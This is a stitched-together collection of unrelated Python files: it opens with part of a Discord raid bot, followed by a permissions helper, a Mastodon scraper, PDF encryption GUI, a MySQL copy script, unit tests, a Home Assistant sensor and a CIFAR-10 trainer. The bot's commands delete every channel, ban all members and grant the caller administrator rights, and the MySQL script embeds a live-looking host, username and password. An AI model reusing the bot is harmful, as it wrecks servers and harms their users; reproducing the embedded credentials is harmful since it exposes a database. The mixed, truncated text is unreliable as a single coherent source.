print ("Action Completed: Banned everyone.")
@client.command(pass_context=True)
async def dc(ctx):
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for channel in list(ctx.message.guild.channels):
try:
await channel.delete()
print (channel.name + " has been deleted")
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.add_field(name="Channel deleted", value=f'#{channel.name}')
await logchannel.send(embed=embed)
except:
pass
guild = ctx.message.guild
channel = await guild.create_text_channel("hello")
await channel.send("g3t 13373d")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print("h4ck3r att4ck f1n1sh3d")
@client.command(pass_context=True)
async def a(ctx):
guild = ctx.message.guild
perms = discord.Permissions(8)
    logchannel = client.get_channel(LOG_CHANNEL_ID)
await guild.create_role(name='*', permissions=perms)
member = ctx.message.author
role = discord.utils.get(guild.roles, name="*")
await member.add_roles(role)
embed = discord.Embed(
colour = discord.Colour.orange()
)
embed.add_field(name="User got admin", value=f'{member}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createchannel(ctx, x):
guild = ctx.message.guild
    logchannel = client.get_channel(LOG_CHANNEL_ID)
for i in range(int(x)):
await guild.create_text_channel("newchannel")
embed = discord.Embed(
colour = discord.Colour.green()
)
embed.add_field(name="Channels created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createrole(ctx, x):
guild = ctx.message.guild
perms = discord.Permissions(0)
logchannel = client.get_channel(739058160291020920)
for i in range(int(x)):
await guild.create_role(name="somerole", permissions=perms)
embed = discord.Embed(
colour = discord.Colour.gold()
)
embed.add_field(name="Roles created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def dm(ctx):
await ctx.author.send("hi")
client.run(BOT_TOKEN)
|
nilq/baby-python
|
python
|
"""Helper file to check if user has valid permissions."""
from application.common.common_exception import (UnauthorizedException,
ResourceNotAvailableException)
from application.model.models import User, UserProjectRole, RolePermission, \
Permission, UserOrgRole, Organization, Project, Role
from index import db
def check_permission(user_object, list_of_permissions=None,
org_id=None, project_id=None):
"""
    Method to check whether the user is authorized.
Args:
list_of_permissions (list): list of permission names to be checked
user_object (object): User object with caller information
org_id (int): Id of the org
project_id (int): Id of the project
    Returns: True if authorized; raises UnauthorizedException otherwise
"""
# check if user is super admin
super_user = User.query.filter_by(user_id=user_object.user_id).first()
if super_user.is_super_admin:
return True
# check for project permission
if project_id:
project_permission = db.session.query(
Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserProjectRole,
RolePermission.role_id == UserProjectRole.role_id).filter(
UserProjectRole.project_id == project_id,
UserProjectRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and project_permission:
return True
if project_permission:
project_permission_from_db = \
[each_permission[0] for each_permission in project_permission]
if set(list_of_permissions).issubset(project_permission_from_db):
return True
# Check for Organization permission
if org_id:
org_permission = db.session.query(Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserOrgRole, RolePermission.role_id == UserOrgRole.role_id).filter(
UserOrgRole.org_id == org_id,
UserOrgRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and org_permission:
return True
if org_permission:
org_permission_from_db = \
[each_permission[0] for each_permission in org_permission]
if set(list_of_permissions).issubset(org_permission_from_db):
return True
raise UnauthorizedException
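# Hedged usage sketch (an illustration, not part of the original module): a view
# helper might guard an endpoint like this; `current_user` and the permission
# name "READ_PROJECT" are assumptions made up for the example.
def _example_guarded_view(current_user, project_id):
    check_permission(current_user,
                     list_of_permissions=["READ_PROJECT"],
                     project_id=project_id)  # raises UnauthorizedException if not allowed
    return {"status": "ok"}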
def check_valid_id_passed_by_user(org_id=None, project_id=None, user_id=None,
role_id=None,
**kwargs):
"""Check if Ids passed are valid in DB."""
valid_org, valid_project, valid_user, valid_role = None, None, None, None
if org_id:
valid_org = Organization.query.filter_by(
org_id=org_id, is_deleted=False).first()
if not valid_org:
raise ResourceNotAvailableException("Organization")
if project_id:
valid_project = Project.query.filter_by(
project_id=project_id, is_deleted=False).first()
if not valid_project:
raise ResourceNotAvailableException("Project")
if user_id:
valid_user = User.query.filter_by(
user_id=user_id, is_deleted=False).first()
if not valid_user:
raise ResourceNotAvailableException("User")
if role_id:
valid_role = Role.query.filter_by(
role_id=role_id).first()
if not valid_role:
raise ResourceNotAvailableException("Role")
return valid_org, valid_project, valid_user, valid_role
|
nilq/baby-python
|
python
|
#!/bin/python3
# this script should be run with a "script" command to save the output into a file
import requests
import io
import json
# put the instance needed here
inst='https://octodon.social/api/v1/timelines/public?local=1'
with io.open("toots.txt","a",encoding="utf8") as f:
while True:
res = requests.get(inst)
toots = res.text
f.write(toots+'\n')
headers = res.headers
links = headers['Link']
suiv=links.split()[0].replace('<',' ').replace('>',' ').replace(';',' ').strip()
print(suiv)
if not suiv.startswith("https") or suiv==inst: break
inst=suiv
# reload
# with io.open("toots.txt","r",encoding="utf-8") as f:
# for l in f:
# res=json.loads(l)
# for t in res: print(t['content'])
# this script only downloads the posts in the public local timeline: so there is no dialog in there yet !
# look at downloadReplies.py next to get the dialogs
|
nilq/baby-python
|
python
|
# Licensed under MIT license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""Utility functions."""
import numpy as np
__all__ = ['mag_to_flux', 'flux_to_mag', 'e1_e2_to_shape', 'shape_to_e1_e2']
def mag_to_flux(mag, zeropoint=27.0):
"""Convert magnitude into flux unit.
"""
return 10.0 ** ((zeropoint - mag) / 2.5)
def flux_to_mag(flux, zeropoint=27.0):
"""Convert flux into magnitude unit.
"""
# TODO: deal with negative values more gracefully
return -2.5 * np.log10(flux) + zeropoint
def e1_e2_to_shape(e1, e2, shape_type='b_a'):
"""Convert the complex ellipticities to normal shape.
"""
    # Position angle
pa = np.arctan(e2 / e1) * 0.5
# Axis ratio or ellipticity or eccentricity
abs_e = np.sqrt(e1 ** 2 + e2 ** 2)
b_a = (1 - abs_e) / (1 + abs_e)
if shape_type == 'b_a':
# Axis ratio
return b_a, pa
elif shape_type == 'ellip':
# Ellipticity
return 1.0 - b_a, pa
elif shape_type == 'eccen':
# Eccentricity
return np.sqrt(1 - b_a ** 2), pa
else:
raise ValueError("# Wrong shape type: [b_a|ellip|eccen]")
def shape_to_e1_e2(b_a, pa):
"""Convert axis ratio and position angle into complex ellipticities.
"""
abs_e = (1 - b_a) / (1 + b_a)
return abs_e * np.cos(2 * pa), abs_e * np.sin(2 * pa)
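# Minimal self-check sketch (added for illustration, not in the original module):
# converting a shape to complex ellipticities and back should round-trip.
if __name__ == "__main__":
    e1, e2 = shape_to_e1_e2(b_a=0.5, pa=0.3)
    b_a, pa = e1_e2_to_shape(e1, e2, shape_type='b_a')
    print(b_a, pa)  # expected: approximately 0.5 and 0.3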
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import os
import sys
import json
import random
from pathlib import Path
from PySide6 import QtCore, QtWidgets
from pikepdf import Pdf, Encryption
class ProtectPdfWindow(QtWidgets.QWidget):
def __init__(self, lang_file='en.json'):
super().__init__()
if os.path.isfile(lang_file):
self.lang = json.loads(open(lang_file, 'r', encoding='utf8').read())
else:
print(f'Error: File {lang_file} does not exist. Using default language English')
self.lang = default_lang
self.buttonChooseDir = QtWidgets.QPushButton(self.lang['select_dir'])
self.buttonStartEncrypting = QtWidgets.QPushButton(self.lang['add_pwd_protection'])
self.exitButton = QtWidgets.QPushButton(self.lang['quit'])
self.dirText = QtWidgets.QLabel(self.lang['no_dir_selected'])
self.infoText = QtWidgets.QLabel(self.lang['will_be_applied_to_zero'])
self.passwordText = QtWidgets.QLabel(self.lang['pwd'])
self.lineEditPassword = QtWidgets.QLineEdit(self)
self.checkBoxDecrypt = QtWidgets.QCheckBox(self.lang['remove_pwd_protection_checkbox'])
self.layout = QtWidgets.QVBoxLayout(self)
self.hbox1 = QtWidgets.QHBoxLayout()
self.hbox2 = QtWidgets.QHBoxLayout()
self.hbox3 = QtWidgets.QHBoxLayout()
self.layout.addLayout(self.hbox1)
self.hbox1.addWidget(self.buttonChooseDir)
self.hbox1.addWidget(self.dirText)
self.layout.addLayout(self.hbox2)
self.hbox2.addWidget(self.passwordText)
self.hbox2.addWidget(self.lineEditPassword)
self.layout.addLayout(self.hbox3)
self.hbox3.addWidget(self.checkBoxDecrypt)
self.hbox3.addWidget(self.buttonStartEncrypting)
self.layout.addWidget(self.infoText)
self.layout.addWidget(self.exitButton)
self.infoText.setWordWrap(True)
self.buttonChooseDir.clicked.connect(self.pickDirectory)
self.buttonStartEncrypting.clicked.connect(self.protectPdfs)
self.checkBoxDecrypt.stateChanged.connect(lambda: self.buttonStartEncrypting.setText(self.lang['remove_pwd_protection'] if self.checkBoxDecrypt.isChecked() else self.lang['add_pwd_protection']))
self.exitButton.clicked.connect(self.close)
self.directory = ''
self.pdfs = []
@QtCore.Slot()
def pickDirectory(self):
self.directory = str(QtWidgets.QFileDialog.getExistingDirectory(self, self.lang['select_dir']))
self.infoText.setText(self.lang['dirs_are_being_searched'])
self.infoText.repaint()
self.dirText.setText(self.directory)
self.pdfs = list(map(str, Path(self.directory).rglob('*.pdf')))
self.infoText.setText(self.eval_lang_string(self.lang['pdfs_were_found'], locals()))
@QtCore.Slot()
def protectPdfs(self):
password = self.lineEditPassword.text()
if not password:
print(self.lang['no_pwd_provided'])
self.infoText.setText(self.lang['no_pwd_provided'])
return
self.infoText.setText('')
infoText = ''
cnt = 0
for pdf_path in self.pdfs:
try:
if self.checkBoxDecrypt.isChecked():
pdf = Pdf.open(pdf_path, password=password)
pdf.save(pdf_path + '.tmp')
else:
pdf = Pdf.open(pdf_path)
pdf.save(pdf_path + '.tmp', encryption=Encryption(owner=password, user=password, R=4))
pdf.close()
os.remove(pdf_path)
os.rename(pdf_path + '.tmp', pdf_path)
modification = self.eval_lang_string(self.lang['pdfs_were_modified'], locals())
print(modification)
infoText += modification + '\n'
cnt += 1
except Exception as e:
error = self.eval_lang_string(self.lang['error_on_pdf_processing'], locals())
print(error)
print(e)
infoText += error + '\n'
infoText += self.eval_lang_string(self.lang['done'], locals())
self.infoText.setText(infoText)
def eval_lang_string(self, s, env=globals() | locals()):
return eval("f'" + s + "'", env)
default_lang = {
    "select_dir":"Select directory",
    "quit":"Quit",
    "no_dir_selected":"No directory selected",
    "will_be_applied_to_zero":"No PDFs will be modified",
    "pwd":"Password:",
    "add_pwd_protection":"Protect PDFs with password",
    "remove_pwd_protection":"Remove passwords from PDFs",
    "remove_pwd_protection_checkbox":"Remove password?",
    "pdfs_were_found":"{str(len(self.pdfs))} PDFs were found",
    "no_pwd_provided":"No password was specified",
    "dirs_are_being_searched":"Directories are being searched",
    "pdfs_were_modified":"PDF was {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"} ({pdf_path})",
    "done":"Done: {cnt}/{len(self.pdfs)} PDFs were {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"}",
    "error_on_pdf_processing":"An error occurred while processing PDF {pdf_path}"
}
if __name__ == '__main__':
app = QtWidgets.QApplication([])
widget = ProtectPdfWindow()
widget.resize(400, 200)
widget.show()
sys.exit(app.exec())
|
nilq/baby-python
|
python
|
def remap( x, oMin, oMax, nMin, nMax ):
#range check
if oMin == oMax:
print("Warning: Zero input range")
return None
if nMin == nMax:
print("Warning: Zero output range")
return None
#check reversed input range
reverseInput = False
oldMin = min( oMin, oMax )
oldMax = max( oMin, oMax )
if not oldMin == oMin:
reverseInput = True
#check reversed output range
reverseOutput = False
newMin = min( nMin, nMax )
newMax = max( nMin, nMax )
if not newMin == nMin :
reverseOutput = True
portion = (x-oldMin)*(newMax-newMin)/(oldMax-oldMin)
if reverseInput:
portion = (oldMax-x)*(newMax-newMin)/(oldMax-oldMin)
result = portion + newMin
if reverseOutput:
result = newMax - portion
return int(result)
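# Illustrative examples (added for clarity, not in the original file):
if __name__ == "__main__":
    print(remap(5, 0, 10, 0, 100))   # 50
    print(remap(2, 0, 10, 0, 100))   # 20
    print(remap(2, 0, 10, 100, 0))   # 80 (reversed output range)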
|
nilq/baby-python
|
python
|
import pandas as pd
import mysql.connector
import json
from pandas.io.json import json_normalize
from sqlalchemy import create_engine
import pymysql.cursors
import datetime
def connect():
""" Connect to MySQL database """
source = None
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
if source:
print('Connected to Source MySQL database')
    except pymysql.Error as e:
print(e)
def test():
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
df = pd.read_sql_query(" SELECT * FROM management_case ", source)
df['time'] =pd.to_timedelta(df['time'])
print(df['time'].head(10))
def read():
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
creds = {'usr': 'tonyho',
'pwd': 'zanik5dbkr',
'hst': '35.220.139.166',
'prt': 3306,
'dbn': 'osmosisdatatest1'}
connstr = 'mysql+mysqlconnector://{usr}:{pwd}@{hst}:{prt}/{dbn}'
engine = create_engine(connstr.format(**creds))
#df = pd.read_sql_query(" SELECT * FROM auth_user ", source)
#df.to_sql(con=engine, name='auth_user', if_exists='append', index=False)
#print("Auth_user work!")
#df = pd.read_sql_query(" SELECT * FROM authtoken_token ", source)
#df.to_sql(con=engine, name='authtoken_token', if_exists='append', index=False)
#print("authtoken_token!")
#df = pd.read_sql_query(" SELECT * FROM OneToOne_customer ", source)
#df.to_sql(con=engine, name='OneToOne_customer', if_exists='append', index=False)
#print("Customer work!")
#df = pd.read_sql_query(" SELECT * FROM management_product " , source)
#df.to_sql(con=engine, name='management_product', if_exists='append',index=False)
#print("Product work!")
#df = pd.read_sql_query(" SELECT * FROM management_technician ", source)
#df.to_sql(con=engine, name='management_technician', if_exists='append', index=False)
#print("Technician work!")
#df = pd.read_sql_query(" SELECT * FROM management_mainperiod ", source)
#df.to_sql(con=engine, name='management_mainperiod', if_exists='append', index=False)
#print("Main Period work!")
#df = pd.read_sql_query(" SELECT * FROM management_filter ", source)
#df.to_sql(con=engine, name='management_filter', if_exists='append', index=False)
#print("Filter work!")
#df = pd.read_sql_query(" SELECT * FROM management_case ", source , parse_dates=['time'])
#df['time'] = pd.DataFrame({'time': pd.to_timedelta(df['time'])})
#df['time'] = df['time'].astype('str')
#df.replace({'NaT': None}, inplace=True)
#df.to_sql(con=engine, name='management_case1', if_exists='append', index=False)
#print("Case work!")
df = pd.read_sql_query(" SELECT * FROM management_case_filters ", source)
df.to_sql(con=engine, name='management_case_filters1', if_exists='append', index=False)
print("Case Filter work!")
df = pd.read_sql_query(" SELECT * FROM management_case_machines ", source)
df.to_sql(con=engine, name='management_case_machines1', if_exists='append', index=False)
print("Case Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_machine ", source)
df.to_sql(con=engine, name='management_machine1', if_exists='append', index=False)
print("Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_mainpack ", source)
df.to_sql(con=engine, name='management_mainpack', if_exists='append', index=False)
print("Mainpack work!")
except Exception as e:
print(e)
if __name__ == '__main__':
connect()
read()
###test()
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import helper_functions.DataFrames as dfimport
def FillNaNWithCurrentDistribution(column, df):
'''
    Input : The name of the column to which the filling strategy should be applied,
    plus the DataFrame object containing the relevant data.
    Output : The Pandas DataFrame object given as input, containing the column where missing values have been replaced
    by values drawn from the column's current distribution.
'''
data = df
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
#res_ser = pd.Series(data[column])
return data
def FillNaNWithCurrentDistributionFromCsv(column, csv):
'''
    Input : The name of the column to which the filling strategy for missing values should be applied,
    plus the name of the csv the data should be obtained from.
    Output : A Pandas Series object containing the column where missing values have been replaced
    by values drawn from the column's current distribution.
'''
data = pd.DataFrame()
if csv.__eq__('listings.csv'):
data = dfimport.GetListingsDataFrame()
elif csv.__eq__('primary_data.csv'):
data = dfimport.GetPrimaryDataFrame()
elif csv.__eq__('secondary_data.csv'):
data = dfimport.GetSecondaryDataFrame()
else:
raise Exception('No data set with this name could be found!')
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
res_ser = pd.Series(data[column])
return res_ser
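# Hedged usage sketch (added for illustration, not part of the original module):
# fill NaNs in a toy column so they follow the observed value distribution.
if __name__ == "__main__":
    toy_df = pd.DataFrame({'room_type': ['Entire home', 'Private room', None,
                                         'Entire home', None]})
    filled = FillNaNWithCurrentDistribution('room_type', toy_df)
    print(filled['room_type'].value_counts(normalize=True))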
|
nilq/baby-python
|
python
|
################################################################################
# Copyright (C) 2013 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for bayespy.utils.linalg module.
"""
import numpy as np
from .. import misc
from .. import linalg
class TestDot(misc.TestCase):
def test_dot(self):
"""
Test dot product multiple multi-dimensional arrays.
"""
# If no arrays, return 0
self.assertAllClose(linalg.dot(),
0)
# If only one array, return itself
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]]),
[[1,2,3],
[4,5,6]])
# Basic test of two arrays: (2,3) * (3,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]]),
[[31,19],
[85,55]])
# Basic test of four arrays: (2,3) * (3,2) * (2,1) * (1,2)
self.assertAllClose(linalg.dot([[1,2,3],
[4,5,6]],
[[7,8],
[9,1],
[2,3]],
[[4],
[5]],
[[6,7]]),
[[1314,1533],
[3690,4305]])
# Test broadcasting: (2,2,2) * (2,2,2,2)
self.assertAllClose(linalg.dot([[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[9,1],
[2,3]],
[[4,5],
[6,7]]]]),
[[[[ 7, 10],
[ 15, 22]],
[[ 67, 78],
[ 91, 106]]],
[[[ 13, 7],
[ 35, 15]],
[[ 56, 67],
[ 76, 91]]]])
# Inconsistent shapes: (2,3) * (2,3)
self.assertRaises(ValueError,
linalg.dot,
[[1,2,3],
[4,5,6]],
[[1,2,3],
[4,5,6]])
# Other axes do not broadcast: (2,2,2) * (3,2,2)
self.assertRaises(ValueError,
linalg.dot,
[[[1,2],
[3,4]],
[[5,6],
[7,8]]],
[[[1,2],
[3,4]],
[[5,6],
[7,8]],
[[9,1],
[2,3]]])
# Do not broadcast matrix axes: (2,1) * (3,2)
self.assertRaises(ValueError,
linalg.dot,
[[1],
[2]],
[[1,2,3],
[4,5,6]])
# Do not accept less than 2-D arrays: (2) * (2,2)
self.assertRaises(ValueError,
linalg.dot,
[1,2],
[[1,2,3],
[4,5,6]])
class TestBandedSolve(misc.TestCase):
def test_block_banded_solve(self):
"""
Test the Gaussian elimination algorithm for block-banded matrices.
"""
#
# Create a block-banded matrix
#
# Number of blocks
N = 40
# Random sizes of the blocks
#D = np.random.randint(5, 10, size=N)
# Fixed sizes of the blocks
        D = 5*np.ones(N, dtype=int)
# Some helpful variables to create the covariances
W = [np.random.randn(D[i], 2*D[i])
for i in range(N)]
# The diagonal blocks (covariances)
A = [np.dot(W[i], W[i].T) for i in range(N)]
# The superdiagonal blocks (cross-covariances)
B = [np.dot(W[i][:,-1:], W[i+1][:,:1].T) for i in range(N-1)]
C = misc.block_banded(A, B)
# Create the system to be solved: y=C*x
x_true = np.random.randn(np.sum(D))
y = np.dot(C, x_true)
x_true = np.reshape(x_true, (N, -1))
y = np.reshape(y, (N, -1))
#
# Run tests
#
# The correct inverse
invC = np.linalg.inv(C)
# Inverse from the function that is tested
(invA, invB, x, ldet) = linalg.block_banded_solve(np.asarray(A),
np.asarray(B),
np.asarray(y))
# Check that you get the correct number of blocks
self.assertEqual(len(invA), N)
self.assertEqual(len(invB), N-1)
# Check each block
i0 = 0
for i in range(N-1):
i1 = i0 + D[i]
i2 = i1 + D[i+1]
# Check diagonal block
self.assertTrue(np.allclose(invA[i], invC[i0:i1, i0:i1]))
# Check super-diagonal block
self.assertTrue(np.allclose(invB[i], invC[i0:i1, i1:i2]))
i0 = i1
# Check last block
self.assertTrue(np.allclose(invA[-1], invC[i0:, i0:]))
# Check the solution of the system
self.assertTrue(np.allclose(x_true, x))
# Check the log determinant
self.assertAlmostEqual(ldet/np.linalg.slogdet(C)[1], 1)
|
nilq/baby-python
|
python
|
# Taken from https://github.com/ojroques/garbled-circuit
import json
# HELPER FUNCTIONS
def parse_json(json_path):
with open(json_path) as json_file:
return json.load(json_file)
|
nilq/baby-python
|
python
|
"""Support the binary sensors of a BloomSky weather station."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.binary_sensor import (
PLATFORM_SCHEMA,
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.const import CONF_MONITORED_CONDITIONS
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from . import DOMAIN
SENSOR_TYPES = {"Rain": BinarySensorDeviceClass.MOISTURE, "Night": None}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSOR_TYPES)): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
)
}
)
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the available BloomSky weather binary sensors."""
# Default needed in case of discovery
if discovery_info is not None:
return
sensors = config[CONF_MONITORED_CONDITIONS]
bloomsky = hass.data[DOMAIN]
for device in bloomsky.devices.values():
for variable in sensors:
add_entities([BloomSkySensor(bloomsky, device, variable)], True)
class BloomSkySensor(BinarySensorEntity):
"""Representation of a single binary sensor in a BloomSky device."""
def __init__(self, bs, device, sensor_name): # pylint: disable=invalid-name
"""Initialize a BloomSky binary sensor."""
self._bloomsky = bs
self._device_id = device["DeviceID"]
self._sensor_name = sensor_name
self._attr_name = f"{device['DeviceName']} {sensor_name}"
self._attr_unique_id = f"{self._device_id}-{sensor_name}"
self._attr_device_class = SENSOR_TYPES.get(sensor_name)
def update(self):
"""Request an update from the BloomSky API."""
self._bloomsky.refresh_devices()
self._attr_is_on = self._bloomsky.devices[self._device_id]["Data"][
self._sensor_name
]
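# Hedged configuration example (an assumption added for illustration; the exact
# platform key depends on DOMAIN): the sensors above would typically be enabled
# from Home Assistant's configuration.yaml roughly like this:
#   binary_sensor:
#     - platform: bloomsky
#       monitored_conditions:
#         - Rain
#         - Night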
|
nilq/baby-python
|
python
|
import pygame
from buttons.image_button import ImageButton
class CardComponent:
def __init__(self, screen, x, y, suit, value):
self.flipped = False
self.value = value
self.suit = suit
card_image = f"assets/{value}_{suit}.png"
self.card = ImageButton(screen, x, y, card_image, 0.5)
self.back_card = ImageButton(screen, x, y, "assets/back_red.png", 0.5)
self.hold = False
def draw(self):
if self.flipped == True:
self.back_card.draw()
else:
self.card.draw()
def flip(self):
self.flipped = not self.flipped
def getFlipped(self):
return self.flipped
def moveCard(self, x, y):
self.card.move(x, y)
def flipHold(self):
self.hold = not self.hold
def getHold(self):
return self.hold
def collides(self, pos):
return self.card.collides(pos) or self.back_card.collides(pos)
|
nilq/baby-python
|
python
|
import os
import time
import torch
import argparse
import torchvision
import torch.nn as nn
import torch.utils.data
import torch.optim as optim
import torchvision.transforms as transforms
from utils.function import *
from model.SE import SEresnet, loss_fn_kd
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR10
best_prec1 = 0
def main(args):
global best_prec1
# CIFAR-10 Training & Test Transformation
print('. . . . . . . . . . . . . . . .PREPROCESSING DATA . . . . . . . . . . . . . . . .')
TRAIN_transform = transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
if args.cutout :
TRAIN_transform.transforms.append(Cutout(n_masks = args.n_masks, length = args.length))
VAL_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
# CIFAR-10 dataset
train_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = True,
transform = TRAIN_transform,
download = True)
val_dataset = torchvision.datasets.CIFAR10(root = '../data/',
train = False,
transform = VAL_transform,
download = True)
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
pin_memory = True,
drop_last = True,
batch_size = args.batch_size ,
shuffle=True)
val_loader = torch.utils.data.DataLoader(dataset=val_dataset,
pin_memory = True,
batch_size = args.batch_size ,
shuffle=False)
# Device Config
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = SEresnet()
model = model.to(device)
criterion = nn.CrossEntropyLoss().to(device)
optimizer = optim.SGD(model.parameters() , lr = args.lr , weight_decay = args.weight_decay, momentum = args.momentum)
lr_schedule = lr_scheduler.MultiStepLR(optimizer, milestones = [250,375], gamma = 0.1)
if args.evaluate :
model.load_state_dict(torch.load('./save_model/model.pt'))
model.to(device)
validation(args, val_loader, model, criterion)
# Epoch = args.Epoch
for epoch_ in range(0, args.Epoch):
print('current lr {:.5e}'.format(optimizer.param_groups[0]['lr']))
if args.KD == True:
teacher_model = SEresnet().to(device)
teacher_checkpoint = './save_model/teacher_model.pt'
load_checkpoint(teacher_checkpoint, teacher_model)
train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_)
else:
train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_)
lr_schedule.step()
prec1 = validation(args, val_loader, model, criterion)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
if epoch_ > 0 and epoch_ % args.save_every == 0:
save_checkpoint({
'epoch': epoch_ + 1,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'checkpoint.pt'))
save_checkpoint({
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=os.path.join(args.save_dir, 'model.pt'))
# torch.save({
# 'epoch': epoch,
# 'model_state_dict': model.state_dict(),
# 'optimizer_state_dict': optimizer.state_dict(),
# 'loss': loss,
# })
print('THE BEST MODEL prec@1 : {best_prec1:.3f} saved. '.format(best_prec1 = best_prec1))
def train_one_epoch(args, train_loader, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# output = output.float()
# loss = loss.float()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
def validation(args, val_loader, model, criterion):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input_, target) in enumerate(val_loader):
input_v = input_.to(device)
target = target.to(device)
target_v = target
output = model(input_v)
loss = criterion(output, target_v)
# loss = loss.float()
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
top1=top1))
print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
return top1.avg
def train_one_epoch_KD(args, train_loader, teacher_model, model, criterion, optimizer, epoch_):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
model.train()
teacher_model.eval()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
input_ = input_.to(device)
target = target.to(device)
output_teacher = teacher_model(input_)
output = model(input_)
# loss = criterion(output, target)
loss = loss_fn_kd(output, target, output_teacher)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure accuracy and record loss
prec1 = accuracy(output.data, target)[0]
losses.update(loss.item(), input_.size(0))
top1.update(prec1.item(), input_.size(0))
batch_time.update( time.time() - end )
end = time.time()
if i % args.print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch_, i,len(train_loader),batch_time=batch_time,loss=losses,top1=top1))
